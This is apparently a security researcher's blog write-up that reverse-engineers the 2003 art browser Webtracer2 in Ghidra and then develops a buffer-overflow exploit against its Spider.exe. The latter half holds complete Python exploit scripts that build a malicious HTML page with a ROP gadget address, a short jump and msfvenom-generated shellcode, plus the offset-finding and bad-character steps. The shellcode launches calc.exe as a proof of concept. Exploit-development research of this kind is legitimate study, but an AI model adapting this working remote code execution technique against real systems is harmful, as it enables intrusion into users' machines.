.+:::::::::::::::::::::::::::::::::::::::::/
.//`+++++++++++++++++++++++++++++++++++++// s
-+/.h+..................................-os s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h/ ss s
-+/.h+ ss s
-++-yo////////////////////////////////////y`s
-+o-:--------------------------::::-:://:---s
-+/ :-.: +:oo- s
-+/```````````````````````````````````:-````s
./o//////////+o:::::::::::::::::s+/////////::
``://////////+s:::::::::::::::::y+/////////:.
s .::::/osso::::. .+
`.y +yyyyhNNNmyyyy+ .+
`:h:::::/+:::::::::::::+:///////////////////+--------------------
.o s s::::::::::::s.+ - +
-/y .o s ::::::::::::oss+::.+
`-y .o y `+//: .+
`.+/y/::/+:::::::::::::+:::::::::::::::::++:.
`////////////////////////////////////:/.
This article analyzes and hacks the art browser Webtracer2 by the artist Nullpointer from the year 2003.
As he has already described the work on his website, this is shown below. (You might have to open the page in another tab and acceppt the certificate...)
This article then goes straight into the analysis.
First let's download the webtracer2.zip and unzip it.
The ZIP archive comes of various files. Particularly interesting are the two exe files: Spider.exe and Visualizer.exe.
As the name already suggests, one of them spiders a website and the other one visualises the data.
Nullpointer also documented and described this in detail on the projects website.
So let's start the analysis with Spider.exe since this is required to run first and comes with more interactive functionality.
By this I mean functions like Request a website we can specify and therefore we can control the response which leads us to lots of possible interactions with Spider.exe.
Binary Orientation Methods
To start the analysis let's open the exe in Ghidra.
Ghidra is a software reverse engineering tool.
It helps examine and understand compiled software code, like executable programs and binaries.
With Ghidra, machine code can be decompiled into more readable source code.
The following screenshot shows a method to quickly orientate in the EXE file.
- First we search for strings.
- Then doubleclick on a string to jump to it's location. This is most commonly somewhere in the .rdata section.
- Ghidra then shows the XREF (cross reference) location 01_GET_PAGES:00402c19, which means the string is used somewhere else in the binary.
- Another doubleclick on the XREF address brings us to the part of the decompiled code where the string is used. In this case it's the function 01_GET_PAGES which already sound promising.
Now we have some foothold from where we can continue the analysis. This technique is powerfull to quickly find relevant parts of the code in lage binarys.
Find interesting code by XREF strings
In this code we can see that some buffers get created in the beginning and later on functions like strcpy are used.
Important: Because strcpy does not check for sufficient space in strDestination before it copies strSource, it is a potential cause of buffer overruns. Therefore, we recommend that you use strcpy_s instead.
This really smells like buffer overflow.
undefined4__fastcall01_GET_PAGES(uintparam_1){intiVar1;undefined4uVar2;undefined4auStack1064[2];intiStack1056;intiStack1052;undefined4uStack1048;characStack1044[256];undefinedauStack788[256];undefinedauStack532[256];undefinedauStack276[256];intiStack20;intiStack16;intiStack12;uintuStack8;*(undefined4*)(param_1+4)=0;uStack8=param_1;status_logger("=======================GETTING PAGE========================");status_logger(uStack8+0x514);strncpy(&DAT_012f766c,"not found",9);DAT_012f7675=0;iStack12=InternetOpenA("webhack",0,0,0,0);if(iStack12==0){error_logger("InternetOpen() failed");}uStack1048=5000;iVar1=InternetSetOptionA(iStack12,2,&uStack1048,4);if(iVar1==0){error_logger("InternetConnect() failed");InternetCloseHandle(iStack12);uVar2=0;}else{iVar1=InternetSetOptionA(iStack12,8,&uStack1048,4);if(iVar1==0){error_logger("InternetConnect() failed");uVar2=0;}else{*(undefined4*)(uStack8+0x914)=0x3c;*(undefined**)(uStack8+0x918)=auStack276;*(undefined4*)(uStack8+0x91c)=0x100;*(undefined**)(uStack8+0x924)=auStack532;*(undefined4*)(uStack8+0x928)=0x100;*(undefined4*)(uStack8+0x930)=0;*(undefined4*)(uStack8+0x934)=0;*(undefined4*)(uStack8+0x938)=0;*(undefined4*)(uStack8+0x93c)=0;*(undefined**)(uStack8+0x940)=auStack788;*(undefined4*)(uStack8+0x944)=0x100;*(undefined4*)(uStack8+0x948)=0;*(undefined4*)(uStack8+0x94c)=0;iVar1=InternetCrackUrlA(uStack8+0x514,0,0,uStack8+0x914);if(iVar1==0){error_logger("InternetCrackURL() failed");InternetCloseHandle(iStack12);uVar2=0;}else{strcpy((char*)(uStack8+0x614),*(char**)(uStack8+0x940));strcpy((char*)(uStack8+0x414),*(char**)(uStack8+0x924));if(*(int*)(uStack8+0x920)==3){iStack16=InternetConnectA(iStack12,auStack532,uStack8&0xffff0000|(uint)*(ushort*)(uStack8+0x92c),0,0,3,0,0);if(iStack16==0){error_logger("InternetConnect() failed");InternetCloseHandle(iStack12);uVar2=0;}else{iStack20=HttpOpenRequestA(iStack16,&DAT_00418784,auStack788,0,0,0,0,0);if(iStack20==0){error_logger("HttpOpenRequest() failed");InternetCloseHandle(iStack12);uVar2=0;}else{iVar1=HttpSendRequestA(iStack20,0,0,0,0);if(iVar1==0){error_logger("HttpSendRequest() failed:");InternetCloseHandle(iStack12);uVar2=0;}else{auStack1064[0]=0x100;iVar1=HttpQueryInfoA(iStack20,0x14,uStack8+0x210,auStack1064,0);if(iVar1==0){error_logger("HttpQueryInfo() failed: ");InternetCloseHandle(iStack12);uVar2=0;}else{auStack1064[0]=4;iVar1=HttpQueryInfoA(iStack20,0x20000013,uStack8+0x410,auStack1064,0);if(iVar1==0){error_logger("HttpQueryInfo() failed: Couldn\'t get statusCODE ");InternetCloseHandle(iStack12);uVar2=0;}elseif(*(int*)(uStack8+0x410)==200){thunk_FUN_00403280();auStack1064[0]=100000;iStack1056=InternetReadFile(iStack20,acStack1044,0xff,&iStack1052);if(iStack1056==0){error_logger("InternetReadFile() failed: didn\'t get page");InternetCloseHandle(iStack12);uVar2=0;}else{acStack1044[iStack1052]='\0';strcpy(&DAT_012f766c,acStack1044);*(int*)(uStack8+8)=*(int*)(uStack8+8)+iStack1052;while(((iStack1052!=0&&(iStack1052!=0))&&(*(int*)(uStack8+8)<0x185a1))){iStack1056=InternetReadFile(iStack20,acStack1044,0xff,&iStack1052);acStack1044[iStack1052]='\0';(&DAT_012f766c)[*(int*)(uStack8+8)]=0;strcat(&DAT_012f766c,acStack1044);*(int*)(uStack8+8)=*(int*)(uStack8+8)+iStack1052;}(&DAT_012f766b)[*(int*)(uStack8+8)]=0x78;(&DAT_012f766c)[*(int*)(uStack8+8)]=0;InternetCloseHandle(iStack12);status_logger("got page");status_logger(uStack8+0x110);uVar2=1;}}else{error_logger("File Not Found");InternetCloseHandle(iStack12);uVar2=1;}}}}}}else{error_logger("USE HTTP-URL Local-File");InternetCloseHandle(iStack12);uVar2=0;}}}}returnuVar2;}
Another method to identify interesting part of the code is similar. But this time we trace not strings but function calls in the imported librarys.
Here we use for example the strcmp function.
- Expand the Symbol Tree in Ghridra on the left and search for interesting function names
- Use the XREF / Cross Reference to navigate to the part of code where the interesting function is used
In other binarys this is a good method to identify a call to some network connection function.
First locate the socket connection library function. Then it can be traced back via the XREFs until a relevant part of the custom code is reached.
The custom code where a network connection is initialised is often a good starting point for reversing around protokolls.
This may also be a good spot for a breakpoint in further dynamic analysis with a debugger.
Find interesting code by XREF function calls in libs
Dynamic Analysis
Now we peaked into the decompiled source code and browsed a little bit through the binary.
But to get more impressions of the whole picture, let's do some dynamic analysis.
First we proxy the traffic through Burp.
Add "127.0.0.1 hacking.art" to /etc/hosts, you know the game.
Another interesting method to proxy client applications is this tool:
https://www.proxifier.com/.
Which can be usefull if the hosts file can not be used or if various urls should be requested independent from Burp proxy forwarding configuration.
Anyways, in the end there is nothing more happening than a simple GET request:
GET / HTTP/1.1
User-Agent: webhack
Host: hacking.art
Connection: close
We can intercept the response also and manually tamper with the HTTP and HTML to provoke some reactions.
This is manual and repeating and most likely get's us nowhere in a reasonable timeframe. Nevertheless good practice and mabye good for a lucky quickwin.
To automate more we can use a similar attempt to the fuzzing showed in Weirdstalker.
But to find a vulnerability I really don't even needed fuzzing.
Before we exlploit the programm however, let's have a little bit fun with it.
I reused my fuzzing code mentioned above and modified it to generate pages for the Spider on the fly.
This means the Spider requests up to 1000 pages and all of them have random links.
# load the needed librarysimportsocketimportthreadingimportimportlibimportmylib# prepare the socket to send data via TCPbind_ip="0.0.0.0"bind_port=80server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# this will open a port on the system and waits for a connection from webstalkerserver.bind((bind_ip,bind_port))server.listen(5)# if a client connects:defhandle_client(client_socket):importlib.reload(mylib)html=mylib.html()# receiving whatever the client talksrequest=client_socket.recv(1024)print(f"sending {len(html)} bytes")# send data (pls crash) and close the connectionclient_socket.send(html)client_socket.close()# some multi threaded client handlingwhileTrue:client,addr=server.accept()print(f"[*] Accepted connection from: {addr[0]}:{addr[1]}")client_handler=threading.Thread(target=handle_client,args=(client,))client_handler.start()
To not stop and start the script every time we want to make a change in the HTML, we reload the second part as a library at runtime.
This allows to modify the second script while the server is running and when we call it with a browser it gets loaded.
In this case the code generates 100 random links.
When requested by Spider.exe, it follows the links and therefore in the end a visualisation with 100 dots and lines gets generated.
But it's also possible to generate more complex pages with nested layers of links and logic depending on what link is requested.
The following code shows an example:
For the Spider.exe this results in quite some work, because the higher numbers in fibonacci generates a lot of links.
But in the end the Visualiser produces some nice structures from this data.
Hundreds of generated linked pages visualized
Luck Buffer Overflow
Now let's get to the fun part.
As mentioned above, in the decompiled code we saw some dangerous functions like strcpy.
As long as we follow the common HTML code structure the Spider.exe eats it.
Our hundreds of randomly generated links were slow but processed in the end.
So what if we "break" the structure?
There are two possible breaking points. On the one hand the HTTP headers and on the other hand some "experimental" HTML code.
Let's try something like the following and hope Spider.exe chokes on something:
And indeed. It really was my first attempt. The HTML was loaded and the debugger showed EXCEPTION_ACCESS_VIOLATION.
EDX gets overwritten with 41414141 in the imported library MSVCRTD.DLL. That is something we can work with.
Now whats interesting is that the application is not stopping immediately at the first EXCEPTION_ACCESS_VIOLATION.
Propably it's only the DLL that crashes. The execution returns to Spider.exe and crashes a second time. Also a second crash dump gets created.
And the second crash happens because back in Spider.exe this cheeky little piece of code wants to be executed:
The second last instruction writes 41414141 to ECX and the last call instruction tries to execute code there.
This means EIP now is 41414141 and we directly control the execution flow.
What a lucky shot!!!
EIP gets overwritten with 41414141
Crafting the Exploit
To craft a fully working exploit we need to find the right offset to inject our shellcode.
For this we can use Metasploits pattern_create
This is a tool that creates a string with a given length and a specific pattern.
Afterwards EIP gets overwritten with a small but recognisable part of the pattern.
This part can be searched in the original pattern wich leads to the exact offset at which byte the buffer but more important the EIP register gets overwritten.
Another look in the CrashDump reveals the exact byte offset overriding EIP.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6b43356b
[*] Exact match at offset 1876
Another look in the CrashDump reveals the exact byte offset overriding EIP.
Let's confirm that by writing CCCC respectively 43434343 to EIP.
It works perfectly as the crashdump shows:
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(3574.1580): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
eax=00000000 ebx=00000000 ecx=43434343 edx=77d88ad0 esi=00000000 edi=00000000
eip=43434343 esp=000a16d0 ebp=000a16f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
43434343 ?? ???
Now we just need to jump to somewhere we can write to.
Unfortunately the stack addresses begin with a nullbyte. For example: 0019F6C8, which is directly behind the overflow offset.
This means we can not just write this address to EIP. We have to get a little bit creative.
At the time of the call ECX instruction gets executed there are a few stack addresses on the stack.
One of them can possibly be used for the exploit: 0019F6C0.
It is the second address on the stack at this point.
Stack address to return to
This means we need a gadget that pops two registers and then return.
Pop the first one that got pushed because of the call ECX. Pop the second one behind and return to the third which we control as it is right before the overflow offset.
This gadget should not have a nullbyte too.
To search for a sufficient gadget we can use a ROPgadget Tool
└─$ ROPgadget --binary MSVCRTD.DLL --depth 5 --console
(ROPgadget)> load
[+] Loading gadgets, please wait...
[+] Gadgets loaded !
(ROPgadget)> search pop ; pop ; ret
[...]
0x10217b07 : pop esi ; pop edi ; ret
It seems we have found a candidate in MSVCRTD.DLL.
Instead of CCCC we can now write \x07\x7b\x21\x10 at the offset.
But now we jump to an address 4 bytes before the EIP override.
That is really not enough space for all the shellcode.
We need another little trick to jump to jump a few bytes behind.
To quickly play (assemble / disassemble) with ASM instructions this website can be helpfull:
https://defuse.ca/online-x86-assembler.htm#disassembly2
After some research I found this website:
https://thestarman.pcministry.com/asm/2bytejumps.htm
which discusses two-byte JMP instructions.
In the end we just need the short jump instruction plus the offset we want to jump.
In our case the necessary bytes are: eb 16.
Lets place \x16\xeb\x90\x90 right before the gadget address.
To write raw bytes to a file we can use python.
import sys;
sys.stdout.buffer.write(b"\x90\x90")
At the moment our exploit looks like this:
importsyspre=b"""<html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Test</title></head><body>"""pre+=b"<a"# dont know why exactly # but we need a link before the BOF# and it has to have at least 252 spaces to work pre+=b" "*252pre+=b"href=\"dummy\"></a>\""link=b"<a href=\""link+=b"A"*1872# short jump forward behind overflowlink+=b"\x90\x90\xeb\x04"# jump to rop gadget in MSVCRTD.DLL# 0x10217b07 : pop esi ; pop edi ; retlink+=b"\x07\x7b\x21\x10"# nop buffer and Stoplink+=b"\x90\x90\x90\x90\xCC"# this is also needed for exploit to work, think of the first crash in dlllink+=b"A"*2000link+=b"\"></a>"post=b"""</body></html>"""html=pre+link+postsys.stdout.buffer.write(html)
Let's try it:
Works like a charm
Time to place the shellcode.
To generate shellcode we simply use the classic msfvenom pop calc method.
Let's also directly exclude null bytes and format to C output to expanf our exploit script.
└─$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 952 bytes
unsigned char buf[] =
"\xbe\xfa\xf5\xdc\xb1\xdd\xc2\xd9\x74\x24\xf4\x5d\x29\xc9"
"\xb1\x31\x83\xed\xfc\x31\x75\x0f\x03\x75\xf5\x17\x29\x4d"
"\xe1\x5a\xd2\xae\xf1\x3a\x5a\x4b\xc0\x7a\x38\x1f\x72\x4b"
"\x4a\x4d\x7e\x20\x1e\x66\xf5\x44\xb7\x89\xbe\xe3\xe1\xa4"
"\x3f\x5f\xd1\xa7\xc3\xa2\x06\x08\xfa\x6c\x5b\x49\x3b\x90"
"\x96\x1b\x94\xde\x05\x8c\x91\xab\x95\x27\xe9\x3a\x9e\xd4"
"\xb9\x3d\x8f\x4a\xb2\x67\x0f\x6c\x17\x1c\x06\x76\x74\x19"
"\xd0\x0d\x4e\xd5\xe3\xc7\x9f\x16\x4f\x26\x10\xe5\x91\x6e"
"\x96\x16\xe4\x86\xe5\xab\xff\x5c\x94\x77\x75\x47\x3e\xf3"
"\x2d\xa3\xbf\xd0\xa8\x20\xb3\x9d\xbf\x6f\xd7\x20\x13\x04"
"\xe3\xa9\x92\xcb\x62\xe9\xb0\xcf\x2f\xa9\xd9\x56\x95\x1c"
"\xe5\x89\x76\xc0\x43\xc1\x9a\x15\xfe\x88\xf0\xe8\x8c\xb6"
"\xb6\xeb\x8e\xb8\xe6\x83\xbf\x33\x69\xd3\x3f\x96\xce\x2b"
"\x0a\xbb\x66\xa4\xd3\x29\x3b\xa9\xe3\x87\x7f\xd4\x67\x22"
"\xff\x23\x77\x47\xfa\x68\x3f\xbb\x76\xe0\xaa\xbb\x25\x01"
"\xff\xdf\xa8\x91\x63\x0e\x4f\x12\x01\x4e";
Unfortunately that doesn't work...
In the debugger it looks like the shellcode gets destroyed.
The application overwrites the buffer during execution again.
After a bit of try and error I found the solution.
Since the programm excpects to parse a link all URL or HTML meta characters are bad.
The shellcode breaks if it has bytes in it that translate to for example these ascii: "#'? > and also linebreaks (0d or 0a).
To get all bad chars we can just create all possible hex values and use them as shellcode.
Then inspect the buffer and remove the bad chars.
Unfortunately, this is a somewhat manual and annoying process.
└─$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00\xff\x0a\x0d\x22\x23\x27\x3e\x3f" -f c
The final exploit looks like this:
importsyspre=b"""<html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Test</title></head><body>"""pre+=b"<a"# dont know why exactly # but we need a link before the BOF# and it has to have at least 252 spaces to work pre+=b" "*252pre+=b"href=\"dummy\"></a>\""link=b"<a href=\""link+=b"A"*1872# short jump forward behind overflowlink+=b"\x90\x90\xeb\x04"# jump to rop gadget in MSVCRTD.DLL# 0x10217b07 : pop esi ; pop edi ; retlink+=b"\x07\x7b\x21\x10"# nop bufferlink+=b"\x90\x90\x90\x90"# shellcode# bad 00 0a 0d 22 23 27 3e 3flink+=b"\xdb\xdb\xba\x60\xe1\xe5\x4b\xd9\x74\x24\xf4\x58\x29\xc9"link+=b"\xb1\x31\x31\x50\x18\x83\xe8\xfc\x03\x50\x74\x03\x10\xb7"link+=b"\x9c\x41\xdb\x48\x5c\x26\x55\xad\x6d\x66\x01\xa5\xdd\x56"link+=b"\x41\xeb\xd1\x1d\x07\x18\x62\x53\x80\x2f\xc3\xde\xf6\x1e"link+=b"\xd4\x73\xca\x01\x56\x8e\x1f\xe2\x67\x41\x52\xe3\xa0\xbc"link+=b"\x9f\xb1\x79\xca\x32\x26\x0e\x86\x8e\xcd\x5c\x06\x97\x32"link+=b"\x14\x29\xb6\xe4\x2f\x70\x18\x06\xfc\x08\x11\x10\xe1\x35"link+=b"\xeb\xab\xd1\xc2\xea\x7d\x28\x2a\x40\x40\x85\xd9\x98\x84"link+=b"\x21\x02\xef\xfc\x52\xbf\xe8\x3a\x29\x1b\x7c\xd9\x89\xe8"link+=b"\x26\x05\x28\x3c\xb0\xce\x26\x89\xb6\x89\x2a\x0c\x1a\xa2"link+=b"\x56\x85\x9d\x65\xdf\xdd\xb9\xa1\x84\x86\xa0\xf0\x60\x68"link+=b"\xdc\xe3\xcb\xd5\x78\x6f\xe1\x02\xf1\x32\x6f\xd4\x87\x48"link+=b"\xdd\xd6\x97\x52\x71\xbf\xa6\xd9\x1e\xb8\x36\x08\x5b\x36"link+=b"\x7d\x11\xcd\xdf\xd8\xc3\x4c\x82\xda\x39\x92\xbb\x58\xc8"link+=b"\x6a\x38\x40\xb9\x6f\x04\xc6\x51\x1d\x15\xa3\x55\xb2\x16"link+=b"\xe6\x35\x55\x85\x6a\x94\xf0\x2d\x08\xe8"# nop bufferlink+=b"\x90\x90\x90\x90"# this is also needed for exploit to work, think of the first crash in dlllink+=b"A"*1500link+=b"\"></a>"post=b"""</body></html>"""html=pre+link+postsys.stdout.buffer.write(html)